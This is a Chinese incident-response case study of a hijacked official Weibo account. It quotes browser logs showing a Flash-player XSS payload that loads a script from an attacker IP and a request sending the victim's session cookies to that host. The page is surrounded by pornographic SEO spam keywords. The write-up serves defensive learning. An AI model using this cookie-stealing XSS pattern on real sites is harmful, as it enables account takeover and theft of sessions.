欧美日操-欧美日韩91-欧美日韩99-欧美日韩ay在线观看-xxxx色-xxxx视频在线

“企業(yè)應急響應和反滲透”之真實案例分析

2015-08-26 14:20:04 大云網(wǎng)  點擊量: 評論 (0)
峰會上講過的議題,整理成文章,以供大家批評指正。對于企業(yè)應急響應,我想只要從事安全工作的同學都有接觸,我也一樣,在甲方乙方工作的這幾年,處理過不少應急響應的事件,但是每個人都會有自己做事的方法,在


0x04 案例之官微帳號被盜

這是第一個案例,是官方微博帳號被盜的案例。首先看下面兩張圖片: 

enter image description here

 

enter image description here

某天我們的一個官方帳號突發(fā)連續(xù)發(fā)兩條不正常的微博內容,看到第一條的時候還以為是工作人員小手一抖,test 到手,以為是工作人員的誤操作,但是看到第二條微博的時候就已經(jīng)能夠判斷帳號出了問題,具體是什么問題只能通過后面的分析才知道。

但是肯定的是這不是工作人員進行的操作,一方面在這種重要帳號的操作上有一些制度,其次是發(fā)布的內容也比較明顯,根據(jù)發(fā)布的時間通過后臺系統(tǒng)分析,該帳號有通過 cookie 在非公司 IP 進行過登錄,但是我們的 cookie 是通過 httponly 進行保護的,how?

接下來鎖定那個時間段操作過官方微博帳號同事的工作電腦,在其使用的火狐瀏覽器中發(fā)現(xiàn)有下面連續(xù)的幾條訪問記錄:


  1. ==================================================  
  2. URL               : http://t.cn/zW*bUQ  
  3. Last Visit Date   : 2012-7-16 19:22:27 
  4. ==================================================  
  5.  
  6. ==================================================  
  7. URL               : http://50.116.13.242/index.php  
  8. Last Visit Date   : 2012-7-16 19:22:28  
  9. Referrer          : http://t.cn/zW*bUQ 
  10. ==================================================  
  11.  
  12. ==================================================  
  13. URL               : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.*.*.242/e.js%3E%3C/script%3E%22%27})  
  14. Last Visit Date   : 2012-7-16 19:22:28  
  15. Referrer          : http://50.116.13.242/index.php  
  16. Title             : player.swf (application/x-shockwave-flash 對象)  
  17. ==================================================  
  18.  
  19. ==================================================  
  20. URL               : http://50.116.13.242/e.php?opener=0&cookie=ULV%3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma%3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B%20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%3D*@sina.com%3B%20wvr%3D3.6%3B%20_s_tentry%3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B%20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des%253D5937b4f4509871fc45195767ea7abe37%2526ev%253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c%25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V%25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2  
  21. Last Visit Date   : 2012-7-16 19:22:31  
  22. Referrer          : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.*.*.242/e.js%3E%3C/script%3E%22%27})  
  23. ================================================== 

對上面的訪問記錄我想我不需要做太多的解釋。在官方微博帳號的私信里面有 http://t.cn/zW*bUQ 的私信記錄。

到這里就已經(jīng)能夠還原整個攻擊場景了

工作人員收到一條私信,并且打開了

私信鏈接是一個 xss 漏洞的鏈接

攻擊代碼利用另外一個業(yè)務的 apache httponly cookie 泄露漏洞竊取到 cookie

事后我們修復了這次攻擊中的漏洞,同時修復了業(yè)務中同類的安全漏洞,同時加強了員工安全意識,并且增加了相應的帳號安全策略。

最后我們通過后臺的 IP 和郵箱等數(shù)據(jù)定位到了攻擊者,在整個攻擊中也并沒有惡意,他也把相關的漏洞和攻擊過程提交到烏云漏洞報告平臺,大家可以去主站找找這個漏洞,我這里就不貼相關鏈接了。


大云網(wǎng)官方微信售電那點事兒

責任編輯:大云網(wǎng)

免責聲明:本文僅代表作者個人觀點,與本站無關。其原創(chuàng)性以及文中陳述文字和內容未經(jīng)本站證實,對本文以及其中全部或者部分內容、文字的真實性、完整性、及時性本站不作任何保證或承諾,請讀者僅作參考,并請自行核實相關內容。
分享到微博分享到微信
我要收藏
個贊
反滲透 案例分析 企業(yè)
評論
點擊加載更多
?
主站蜘蛛池模板: 色黄网站aaaaaa级毛片| 亚洲国产精品美女| 偷拍亚洲欧美| 香蕉蕉亚亚洲aav综合| 亚洲精品自在线拍| 欧美日韩极品| 欧美婷婷综合| 欧日韩一区二区三区| 日本精品影院| 视频播放在线观看精品视频| 亚洲四虎| 四虎影视在线永久免费观看| 婷婷综合缴情亚洲五月伊| 手机看片91精品一区| 日韩精品欧美国产精品忘忧草| 秋霞影院精品久久久久| 四虎国产一区| 亚洲jizzjizz| 我要看免费毛片| 日韩亚色| 台湾av| 性欧美长视频免费观看不卡| 奇米影视奇米色777欧美| 日本乱人伦在线观看免费| 午夜免费视频福利集合100| 欧美性导航| 视频一区在线免费观看| 欧美亚洲国产精品久久久久| 青青青国产在线视频| 日韩免费在线视频观看| 日韩欧美精品| 日韩在线国产| 欧美伊人网| 欧美区国产区| 日本动漫黄网站在线观看| 欧美综合激情| 亚洲一级高清在线中文字幕| 青草99| 日韩欧美一中文字幕不卡| 亚洲欧美精品久久| 日韩免费一区二区三区|